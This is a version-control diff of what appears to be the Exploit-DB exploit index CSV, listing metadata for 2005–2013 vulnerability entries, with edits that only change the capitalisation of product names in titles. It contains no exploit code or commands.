Error.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 - Login.asp Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25517,platforms/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload",2013-05-17,Metasploit,linux,remote,0 -25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 +25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 25519,platforms/php/webapps/25519.txt,"ZPanel - templateparser.class.php Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 - Login.asp Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - SearchResults.asp SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 @@ -22726,14 +22726,14 @@ id,file,description,date,author,platform,type,port 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - Defer.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - Details.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",windows,remote,0 -25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 +25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0 25601,platforms/php/webapps/25601.txt,"FishCart 3.1 - display.php nlst Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 25602,platforms/php/webapps/25602.txt,"FishCart 3.1 - upstracking.php Multiple Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 25603,platforms/php/webapps/25603.txt,"FishCart 3.1 - display.php psku Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 25604,platforms/php/webapps/25604.txt,"FishCart 3.1 - upstnt.php cartid Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 -25605,platforms/php/webapps/25605.txt,"WordPress ProPlayer Plugin 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 +25605,platforms/php/webapps/25605.txt,"Wordpress ProPlayer Plugin 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 25606,platforms/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection",2013-05-21,drone,php,webapps,0 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Local Code Execution Buffer Overflow",2013-05-21,xis_one,windows,local,0 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,Metasploit,hardware,remote,80 @@ -22760,11 +22760,11 @@ id,file,description,date,author,platform,type,port 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - OUT.php SQL Injection",2005-05-06,Kold,php,webapps,0 25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0 25625,platforms/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2)",2005-05-11,K-sPecial,unix,remote,0 -25626,platforms/osx/remote/25626.c,"4D WebStar 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",osx,remote,0 +25626,platforms/osx/remote/25626.c,"4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",osx,remote,0 25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,php,remote,0 25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos,0 -25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 +25630,platforms/php/webapps/25630.txt,"Advanced GuestBook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0 25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x - Smiley Icon Location Remote Denial of Service",2005-05-09,fjlj@wvi.com,windows,dos,0 @@ -22796,7 +22796,7 @@ id,file,description,date,author,platform,type,port 25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - Start-Page.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 -25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 +25662,platforms/php/webapps/25662.txt,"Skull-Splitter GuestBook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script - CategoryID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps,0 @@ -22816,7 +22816,7 @@ id,file,description,date,author,platform,type,port 25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_sponsor.php id Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25680,platforms/windows/dos/25680.txt,"War Times - Remote Game Server Denial of Service",2005-05-17,"Luigi Auriemma",windows,dos,0 25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 - X-ForwordedFor PHP Script Code Injection",2005-05-24,"Network security team",php,webapps,0 -25682,platforms/php/webapps/25682.txt,"WordPress 1.5 - Post.php Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps,0 +25682,platforms/php/webapps/25682.txt,"Wordpress 1.5 - Post.php Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps,0 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",jsp,webapps,0 @@ -22854,9 +22854,9 @@ id,file,description,date,author,platform,type,port 25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module parameter) Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 -25721,platforms/php/webapps/25721.txt,"WordPress User Role Editor Plugin 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 -25723,platforms/php/webapps/25723.txt,"WordPress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25724,platforms/php/webapps/25724.txt,"WordPress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 +25721,platforms/php/webapps/25721.txt,"Wordpress User Role Editor Plugin 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 +25723,platforms/php/webapps/25723.txt,"Wordpress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 +25724,platforms/php/webapps/25724.txt,"Wordpress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25725,platforms/windows/local/25725.rb,"AdobeCollabSync - Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,Metasploit,windows,local,0 25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - (menager.php playlist_id parameter) SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 @@ -22954,8 +22954,8 @@ id,file,description,date,author,platform,type,port 25806,platforms/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps,0 25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 -25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (Mac OS X) - Crash PoC",2013-05-29,ariarat,osx,dos,0 -25810,platforms/hardware/webapps/25810.py,"TP-LINK WR842ND - Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 +25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (Mac OSX) - Crash PoC",2013-05-29,ariarat,osx,dos,0 +25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 @@ -23111,7 +23111,7 @@ id,file,description,date,author,platform,type,port 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - (alertConfigField.php urlConfig parameter) Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 - (tinybrowser.php folder parameter) Path Traversal",2013-06-05,expl0i13r,php,webapps,0 -25974,platforms/osx/dos/25974.txt,"Mac OS X Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 +25974,platforms/osx/dos/25974.txt,"Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,Metasploit,linux,remote,5555 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 @@ -23131,7 +23131,7 @@ id,file,description,date,author,platform,type,port 25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering Unspecified Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0 25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos,0 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 -25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 - Update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 +25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - Update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0 25997,platforms/php/webapps/25997.txt,"tForum b0.9 - Member.php Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 @@ -23158,8 +23158,8 @@ id,file,description,date,author,platform,type,port 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 -26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 -26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 +26020,platforms/php/webapps/26020.txt,"Asn GuestBook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 +26021,platforms/php/webapps/26021.txt,"Asn GuestBook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0 26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0 @@ -23173,7 +23173,7 @@ id,file,description,date,author,platform,type,port 26032,platforms/windows/remote/26032.html,"SPI Dynamics WebInspect 5.0.196 - Cross Application Script Injection",2005-07-26,QQLan@yandex.ru,windows,remote,0 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - ViewCart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 -26035,platforms/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote,0 +26035,platforms/windows/remote/26035.txt,"Advanced GuestBook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote,0 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - results.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - categorysearch.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 @@ -23183,7 +23183,7 @@ id,file,description,date,author,platform,type,port 26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0 26044,platforms/windows/remote/26044.txt,"MDaemon 8.0 - Content Filter Directory Traversal",2005-07-27,"Tan Chew Keong",windows,remote,0 -26045,platforms/php/webapps/26045.txt,"PHPList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0 +26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 @@ -23265,7 +23265,7 @@ id,file,description,date,author,platform,type,port 26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 - profile.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 -26124,platforms/php/webapps/26124.txt,"WordPress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 +26124,platforms/php/webapps/26124.txt,"Wordpress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname parameter) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 @@ -23273,7 +23273,7 @@ id,file,description,date,author,platform,type,port 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0 26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0 -26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 +26132,platforms/php/webapps/26132.txt,"Fobuc GuestBook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow",2013-06-11,Metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution",2013-06-11,Metasploit,multiple,remote,0 @@ -23293,7 +23293,7 @@ id,file,description,date,author,platform,type,port 26149,platforms/php/webapps/26149.txt,"MyBulletinBoard RC4 - polls.php polloptions Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26150,platforms/php/webapps/26150.txt,"MyBulletinBoard RC4 - search.php action Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26151,platforms/windows/remote/26151.txt,"Isemarket JaguarControl - ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",windows,remote,0 -26152,platforms/osx/remote/26152.txt,"Apple Mac OS X 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 +26152,platforms/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.asp SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps,0 @@ -23326,7 +23326,7 @@ id,file,description,date,author,platform,type,port 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - Browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 -26185,platforms/osx/local/26185.txt,"Apple Mac OS X 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 +26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 NewBB_Plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 @@ -23379,7 +23379,7 @@ id,file,description,date,author,platform,type,port 26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - news.php Multiple Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 -26240,platforms/php/webapps/26240.txt,"Ultimate WordPress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 +26240,platforms/php/webapps/26240.txt,"Ultimate Wordpress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - (.wax) SEH Buffer Overflow",2013-06-17,Onying,windows,local,0 26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 @@ -23413,17 +23413,17 @@ id,file,description,date,author,platform,type,port 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,php,webapps,0 -26273,platforms/php/webapps/26273.txt,"VBulletin 1.0.1 lite/2.x/3.0 - joinrequests.php request Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26274,platforms/php/webapps/26274.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26275,platforms/php/webapps/26275.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertitle.php usertitleid Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26276,platforms/php/webapps/26276.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertools.php ids Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26273,platforms/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - joinrequests.php request Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26274,platforms/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertitle.php usertitleid Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertools.php ids Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injection",2005-09-19,"David Sopas Ferreira",php,webapps,0 -26278,platforms/php/webapps/26278.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/css.php group Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26279,platforms/php/webapps/26279.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/index.php Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26280,platforms/php/webapps/26280.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php email Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26281,platforms/php/webapps/26281.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/language.php goto Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26282,platforms/php/webapps/26282.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26283,platforms/php/webapps/26283.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/css.php group Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26279,platforms/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/index.php Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php email Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/language.php goto Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26283,platforms/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injection",2005-09-19,"David Sopas Ferreira",php,webapps,0 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 @@ -23467,7 +23467,7 @@ id,file,description,date,author,platform,type,port 26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0 